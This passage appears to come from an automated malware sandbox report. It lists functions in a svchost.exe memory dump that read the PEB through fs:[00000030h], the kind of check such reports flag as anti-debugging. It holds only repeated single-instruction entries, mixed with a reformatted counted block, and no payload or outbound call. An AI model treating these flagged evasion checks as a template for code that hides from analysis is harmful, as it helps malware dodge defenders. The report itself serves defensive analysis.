            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D437C mov eax, dword ptr fs:[00000030h]4_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C310 mov ecx, dword ptr fs:[00000030h]4_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550310 mov ecx, dword ptr fs:[00000030h]4_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov ecx, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D43D4 mov eax, dword ptr fs:[00000030h]4_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D43D4 mov eax, dword ptr fs:[00000030h]4_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EC3CD mov eax, dword ptr fs:[00000030h]4_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            The following svchost.exe code functions read the PEB pointer out of the TEB (fs:[00000030h] in 32-bit code). One entry per function, with the destination register and the number of such reads the disassembler found in that function; the 4_2_ prefix is the report's process and memory-dump identifier.
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035383C0 mov eax, dword ptr fs:[00000030h] (4 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B63C0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354E3F0 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035663FF mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h] (8 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03528397 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352E388 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355438F mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352A250 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03536259 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B8243 mov eax, dword ptr fs:[00000030h] (1 read); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h] (12 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03534260 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352826B mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352823B mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h] (5 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035402E1 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356E284 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B0283 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035402A0 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h] (5 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352C156 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C8158 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03536154 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C4144 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DA118 mov eax, dword ptr fs:[00000030h] (3 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F0115 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h] (6 reads); mov ecx, dword ptr fs:[00000030h] (4 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03560124 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_036061E5 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035AE1D0 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F61C3 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035601F8 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B019F mov eax, dword ptr fs:[00000030h] (4 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352A197 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03570185 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035EC188 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035D4180 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03532050 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B6050 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355C073 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354E016 mov eax, dword ptr fs:[00000030h] (4 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B4000 mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h] (8 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C6030 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352A020 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352C020 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B20DE mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352C0F0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035720F0 mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352A0E3 mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035380E9 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B60E0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353208A mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F60B8 mov eax, dword ptr fs:[00000030h] (1 read); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C80A8 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03530750 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035BE75D mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03572750 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B4755 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356674D mov esi, dword ptr fs:[00000030h] (1 read); mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03538770 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540770 mov eax, dword ptr fs:[00000030h] (12 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03530710 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03560710 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356C700 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356273C mov eax, dword ptr fs:[00000030h] (2 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035AC730 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356C720 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353C7C0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B07C3 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035347FB mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035527ED mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035BE7E1 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035D678E mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035307AF mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354C640 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03562674 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F866E mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356A660 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03572619 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035AE609 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354260B mov eax, dword ptr fs:[00000030h] (7 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354E627 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03566620 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03568620 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353262C mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356A6C7 mov ebx, dword ptr fs:[00000030h] (1 read); mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035AE6F2 mov eax, dword ptr fs:[00000030h] (4 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B06F1 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03534690 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035666B0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356C6A6 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03538550 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356656A mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C6500 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03604500 mov eax, dword ptr fs:[00000030h] (7 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540535 mov eax, dword ptr fs:[00000030h] (6 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h] (5 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035365D0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356A5D0 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356E5CF mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h] (8 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035325E0 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356C5ED mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356E59C mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03532582 mov eax, dword ptr fs:[00000030h] (1 read); mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03564588 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035545B1 mov eax, dword ptr fs:[00000030h] (2 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B05A7 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352645D mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355245A mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h] (8 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355A470 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035BC460 mov ecx, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03568402 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356A430 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352E420 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352C427 mov eax, dword ptr fs:[00000030h] (1 read)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h] (3 reads)
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035304E5 mov ecx, dword ptr fs:[00000030h]4_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035644B0 mov ecx, dword ptr fs:[00000030h]4_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BA4B0 mov eax, dword ptr fs:[00000030h]4_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035364AB mov eax, dword ptr fs:[00000030h]4_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEB50 mov eax, dword ptr fs:[00000030h]4_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6B40 mov eax, dword ptr fs:[00000030h]4_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6B40 mov eax, dword ptr fs:[00000030h]4_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FAB40 mov eax, dword ptr fs:[00000030h]4_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D8B42 mov eax, dword ptr fs:[00000030h]4_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CB7E mov eax, dword ptr fs:[00000030h]4_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EB20 mov eax, dword ptr fs:[00000030h]4_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EB20 mov eax, dword ptr fs:[00000030h]4_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F8B28 mov eax, dword ptr fs:[00000030h]4_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F8B28 mov eax, dword ptr fs:[00000030h]4_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEBD0 mov eax, dword ptr fs:[00000030h]4_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EBFC mov eax, dword ptr fs:[00000030h]4_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BCBF0 mov eax, dword ptr fs:[00000030h]4_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540BBE mov eax, dword ptr fs:[00000030h]4_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540BBE mov eax, dword ptr fs:[00000030h]4_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540A5B mov eax, dword ptr fs:[00000030h]4_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540A5B mov eax, dword ptr fs:[00000030h]4_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035ACA72 mov eax, dword ptr fs:[00000030h]4_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035ACA72 mov eax, dword ptr fs:[00000030h]4_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEA60 mov eax, dword ptr fs:[00000030h]4_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BCA11 mov eax, dword ptr fs:[00000030h]4_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03554A35 mov eax, dword ptr fs:[00000030h]4_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03554A35 mov eax, dword ptr fs:[00000030h]4_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA38 mov eax, dword ptr fs:[00000030h]4_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA24 mov eax, dword ptr fs:[00000030h]4_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EA2E mov eax, dword ptr fs:[00000030h]4_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530AD0 mov eax, dword ptr fs:[00000030h]4_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03564AD0 mov eax, dword ptr fs:[00000030h]4_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03564AD0 mov eax, dword ptr fs:[00000030h]4_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356AAEE mov eax, dword ptr fs:[00000030h]4_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356AAEE mov eax, dword ptr fs:[00000030h]4_2_0356AAEE
